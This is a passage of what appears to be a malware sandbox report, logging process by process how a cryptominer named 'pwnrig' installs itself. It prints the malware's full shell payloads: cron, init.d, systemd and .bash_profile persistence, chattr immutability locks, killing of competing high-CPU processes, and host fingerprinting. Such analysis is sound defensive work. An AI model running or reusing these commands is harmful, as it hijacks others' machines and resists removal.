/lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"2⤵
- Writes file to tmp directory
PID:2588 -
/usr/bin/idid -u3⤵PID:2589
/usr/bin/idid -u3⤵PID:2590
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"3⤵
- Attempts to change immutable files
/bin/rmrm -rf /bin/bprofr3⤵PID:2592
/bin/sedsed -i /bprofr/d "~/.bash_profile"3⤵PID:2593
/bin/cpcp -f -r -- /tmp/service-agent /bin/bprofr3⤵
- Writes file to system bin folder
/usr/bin/idid -u3⤵PID:2595
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"3⤵PID:2596
/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly3⤵PID:2597
/usr/bin/chattrchattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵PID:2598
/bin/rmrm -rf /bin/crondr3⤵PID:2599
/bin/cpcp -f -r -- /tmp/service-agent /bin/crondr3⤵
- Writes file to system bin folder
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig3⤵
- Creates/modifies Cron job
/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig3⤵
- Creates/modifies Cron job
/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵PID:2604
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵PID:2605
/usr/bin/whichwhich chkconfig3⤵PID:2606
/usr/bin/whichwhich update-rc.d3⤵PID:2607
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr3⤵PID:2608
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable3⤵
- Flushes firewall rules
PID:2609 -
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:2610
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:2610
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:2610
/usr/bin/systemctlsystemctl daemon-reload4⤵PID:2610
/sbin/systemctlsystemctl daemon-reload4⤵PID:2610
/bin/systemctlsystemctl daemon-reload4⤵PID:2610
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove3⤵PID:2631
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:2632
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:2632
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:2632
/usr/bin/systemctlsystemctl daemon-reload4⤵PID:2632
/sbin/systemctlsystemctl daemon-reload4⤵PID:2632
/bin/systemctlsystemctl daemon-reload4⤵PID:2632
/bin/rmrm -rf /bin/initdr3⤵PID:2653
/bin/cpcp -f -r -- /tmp/service-agent /bin/initdr3⤵
- Writes file to system bin folder
/usr/bin/teetee /etc/init.d/pwnrig3⤵
- Modifies init.d
/bin/sedsed -i "1 s/-e //" /etc/init.d/pwnrig3⤵
- Modifies init.d
/bin/chmodchmod +x /etc/init.d/pwnrig /bin/initdr3⤵PID:2658
/usr/sbin/update-rc.dupdate-rc.d pwnrig defaults3⤵PID:2659
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:2660
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:2660
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:2660
/usr/bin/systemctlsystemctl daemon-reload4⤵PID:2660
/sbin/systemctlsystemctl daemon-reload4⤵PID:2660
/bin/systemctlsystemctl daemon-reload4⤵PID:2660
/usr/sbin/update-rc.dupdate-rc.d pwnrig enable3⤵PID:2681
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:2682
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:2682
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:2682
/usr/bin/systemctlsystemctl daemon-reload4⤵PID:2682
/sbin/systemctlsystemctl daemon-reload4⤵PID:2682
/bin/systemctlsystemctl daemon-reload4⤵PID:2682
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr3⤵
- Attempts to change immutable files
/usr/bin/whichwhich systemctl3⤵PID:2704
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr3⤵
- Attempts to change immutable files
/bin/rmrm -rf /bin/sysdr3⤵PID:2706
/bin/cpcp -f -r -- /tmp/service-agent /bin/sysdr3⤵
- Writes file to system bin folder
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service3⤵
- Modifies systemd
/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service3⤵PID:2710
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr3⤵PID:2711
/bin/systemctlsystemctl enable pwnrige.service3⤵PID:2712
/bin/systemctlsystemctl enable pwnrigl.service3⤵PID:2733
/bin/systemctlsystemctl daemon-reload3⤵PID:2754
/bin/systemctlsystemctl reload-or-restart pwnrige.service3⤵PID:2775
/bin/hostnamehostname -I1⤵PID:2553
/usr/bin/awkawk "{print \$1}"1⤵PID:2555
/usr/bin/awkawk "{print \"-\"\$2}"1⤵PID:2560
/usr/bin/headhead -n 11⤵PID:2559
/bin/grepgrep "Port "1⤵PID:2558
/bin/catcat /etc/ssh/sshd_config1⤵PID:2557
/bin/sedsed -e "s/\$//"1⤵PID:2569
/bin/sedsed -e "s/^ *//"1⤵PID:2568
/usr/bin/cutcut -d: -f21⤵PID:2567
/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
/usr/bin/awkawk "{print \$1}"1⤵PID:2572
/usr/bin/awkawk "{print \$4}"1⤵PID:2575
/usr/bin/awkawk "{print \$4}"1⤵PID:2578
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:2817 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵PID:2841
/bin/grepgrep -c "^processor" /proc/cpuinfo3⤵
- Checks CPU configuration
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵PID:2870
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵PID:2872
/bin/psps -A "-ostat,ppid"3⤵PID:2871
/usr/bin/idid -u3⤵PID:2874
/bin/grepgrep -v grep3⤵PID:2877
/bin/grepgrep /etc/cron3⤵PID:2876
/bin/psps x3⤵
- Reads CPU attributes
- Reads runtime system information
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵PID:2879
/usr/bin/idid -u3⤵PID:2880
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"3⤵PID:2885
/bin/grepgrep -v /usr/sbin/httpd3⤵PID:2884
/bin/grepgrep -v -- "-bash[[:space:]]*\$"3⤵PID:2883
/bin/grepgrep -v grep3⤵PID:2882
/bin/psps aux3⤵
- Reads CPU attributes
- Reads runtime system information
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"2⤵PID:2887
/usr/bin/idid -u3⤵PID:2888
/bin/hostnamehostname -I1⤵PID:2844
/usr/bin/awkawk "{print \$1}"1⤵PID:2846
/usr/bin/awkawk "{print \"-\"\$2}"1⤵PID:2851
/usr/bin/headhead -n 11⤵PID:2850
/bin/grepgrep "Port "1⤵PID:2849
/bin/catcat /etc/ssh/sshd_config1⤵PID:2848
/bin/sedsed -e "s/\$//"1⤵PID:2860
/bin/sedsed -e "s/^ *//"1⤵PID:2859
/usr/bin/cutcut -d: -f21⤵PID:2858
/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
/usr/bin/awkawk "{print \$1}"1⤵PID:2863
/usr/bin/awkawk "{print \$4}"1⤵PID:2866
/usr/bin/awkawk "{print \$4}"1⤵PID:2869
/usr/bin/wcwc -l1⤵PID:2894
/bin/grepgrep -- "-bash[[:space:]]*\$"1⤵PID:2892
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"1⤵PID:2893
/bin/grepgrep -v grep1⤵PID:2891
/bin/psps aux1⤵
- Reads CPU attributes
- Reads runtime system information
- Executes dropped EXE
- Writes file to tmp directory
/bin/hostnamehostname -I1⤵PID:2923
/usr/bin/awkawk "{print \$1}"1⤵PID:2925
/usr/bin/awkawk "{print \"-\"\$2}"1⤵PID:2930
/usr/bin/headhead -n 11⤵PID:2929
/bin/grepgrep "Port "1⤵PID:2928
/bin/catcat /etc/ssh/sshd_config1⤵PID:2927
/bin/sedsed -e "s/\$//"1⤵PID:2939
/usr/bin/cutcut -d: -f21⤵PID:2937
/bin/sedsed -e "s/^ *//"1⤵PID:2938
/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
/usr/bin/awkawk "{print \$1}"1⤵PID:2942
/usr/bin/awkawk "{print \$4}"1⤵PID:2945
/usr/bin/awkawk "{print \$4}"1⤵PID:2948
/bin/hostnamehostname -I1⤵
- Attempts to change immutable files
/usr/bin/awkawk "{print \$1}"1⤵PID:3216
/usr/bin/awkawk "{print \"-\"\$2}"1⤵PID:3221
/usr/bin/headhead -n 11⤵PID:3220
/bin/grepgrep "Port "1⤵PID:3219
/bin/catcat /etc/ssh/sshd_config1⤵PID:3218
/bin/sedsed -e "s/\$//"1⤵PID:3230
/bin/sedsed -e "s/^ *//"1⤵PID:3229
/usr/bin/cutcut -d: -f21⤵PID:3228
/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
/usr/bin/awkawk "{print \$1}"1⤵PID:3233
/usr/bin/awkawk "{print \$4}"1⤵PID:3236
/usr/bin/awkawk "{print \$4}"1⤵PID:3239
/usr/bin/wcwc -l1⤵PID:3264
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"1⤵PID:3263
/bin/grepgrep -- "-bash[[:space:]]*\$"1⤵PID:3262
/bin/grepgrep -v grep1⤵PID:3261
/bin/psps aux1⤵
- Reads CPU attributes
/bin/hostnamehostname -I1⤵
- Attempts to change immutable files
/usr/bin/awkawk "{print \$1}"1⤵PID:3299
/bin/grepgrep "Port "1⤵PID:3302
/bin/catcat /etc/ssh/sshd_config1⤵PID:3301
/usr/bin/headhead -n 11⤵PID:3303
/usr/bin/awkawk "{print \"-\"\$2}"1⤵PID:3304
/bin/sedsed -e "s/\$//"1⤵PID:3313
/bin/sedsed -e "s/^ *//"1⤵PID:3312
/usr/bin/cutcut -d: -f21⤵PID:3311
/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
/usr/bin/awkawk "{print \$1}"1⤵PID:3316
/usr/bin/awkawk "{print \$4}"1⤵PID:3319
/usr/bin/awkawk "{print \$4}"1⤵PID:3322
/bin/hostnamehostname -I1⤵PID:3588
/usr/bin/awkawk "{print \$1}"1⤵PID:3592
/bin/catcat /etc/ssh/sshd_config1⤵PID:3594
/bin/grepgrep "Port "1⤵PID:3595
/usr/bin/awkawk "{print \"-\"\$2}"1⤵PID:3597
/usr/bin/headhead -n 11⤵PID:3596
/bin/sedsed -e "s/\$//"1⤵PID:3606
/usr/bin/cutcut -d: -f21⤵PID:3604
/bin/sedsed -e "s/^ *//"1⤵PID:3605
/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
/usr/bin/awkawk "{print \$1}"1⤵PID:3609
/usr/bin/awkawk "{print \$4}"1⤵PID:3612
/usr/bin/awkawk "{print \$4}"1⤵PID:3615
/usr/bin/wcwc -l1⤵PID:3640
/bin/grepgrep -- "-bash[[:space:]]*\$"1⤵PID:3638
/bin/grepgrep -v grep1⤵PID:3637
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"1⤵PID:3639
/bin/psps aux1⤵
- Reads CPU attributes
- Reads runtime system information
/usr/bin/crontabcrontab -r1⤵PID:3642
/usr/bin/pkillpkill -f .klibsystem51⤵
- Reads CPU attributes
/usr/bin/pkillpkill -f .klibsystem41⤵
- Reads CPU attributes
/bin/bashbash -c "echo \"* * * * * /var/tmp/.klibsystem5 >/dev/null 2>&1\" | crontab -"1⤵PID:3645
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
/usr/bin/chattrchattr -ia /etc/cron.d/.lib-knlib41⤵PID:3648
/usr/bin/chattrchattr +ia /etc/cron.d/.lib-knlib41⤵PID:3649
/usr/bin/chattrchattr -ia /var/spool/cron/.lib-knlib41⤵PID:3650
/usr/bin/chattrchattr +ia /var/spool/cron/.lib-knlib41⤵PID:3651
/usr/bin/chattrchattr -ia /etc/cron.hourly/.lib-knlib41⤵PID:3652
/usr/bin/chattrchattr +ia /etc/cron.hourly/.lib-knlib41⤵
- Attempts to change immutable files
/usr/bin/chattrchattr -ia /etc/cron.daily/.lib-knlib41⤵PID:3654
/usr/bin/chattrchattr +ia /etc/cron.daily/.lib-knlib41⤵PID:3655
/usr/bin/chattrchattr -ia /etc/cron.weekly/.lib-knlib41⤵PID:3656
/usr/bin/chattrchattr +ia /etc/cron.weekly/.lib-knlib41⤵
- Attempts to change immutable files
/usr/bin/chattrchattr -ia /etc/cron.monthly/.lib-knlib41⤵PID:3658
/usr/bin/chattrchattr +ia /etc/cron.monthly/.lib-knlib41⤵PID:3659
/usr/bin/chattrchattr -ia /etc/anacrontab1⤵PID:3660
/usr/bin/chattrchattr +ia /etc/anacrontab1⤵PID:3661
- Executes dropped EXE
- Writes file to tmp directory
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
PID:3663 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵PID:3664
/bin/grepgrep -c "^processor" /proc/cpuinfo3⤵
- Checks CPU configuration
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵PID:3693
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵PID:3695
/bin/psps -A "-ostat,ppid"3⤵PID:3694
/usr/bin/idid -u3⤵PID:3697
/bin/grepgrep -v grep3⤵PID:3700
/bin/grepgrep /etc/cron3⤵PID:3699
/bin/psps x3⤵
- Reads CPU attributes
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\\\\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"2⤵
- Writes file to tmp directory
PID:3702 -
/usr/bin/idid -u3⤵PID:3703
/usr/bin/idid -u3⤵PID:3704
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"3⤵PID:3705
/bin/rmrm -rf /bin/bprofr3⤵PID:3706
/bin/sedsed -i /bprofr/d "~/.bash_profile"3⤵PID:3707
/bin/cpcp -f -r -- /tmp/service-agent /bin/bprofr3⤵
- Writes file to system bin folder
/usr/bin/idid -u3⤵PID:3709
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"3⤵PID:3710
/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly3⤵PID:3711
/usr/bin/chattrchattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵PID:3712
/bin/rmrm -rf /bin/crondr3⤵PID:3713
/bin/cpcp -f -r -- /tmp/service-agent /bin/crondr3⤵
- Writes file to system bin folder
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig3⤵
- Creates/modifies Cron job
/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig3⤵
- Creates/modifies Cron job
/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵PID:3718
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵PID:3719
/usr/bin/whichwhich chkconfig3⤵PID:3720
/usr/bin/whichwhich update-rc.d3⤵PID:3721
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr3⤵PID:3722
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable3⤵
- Flushes firewall rules
PID:3723 -
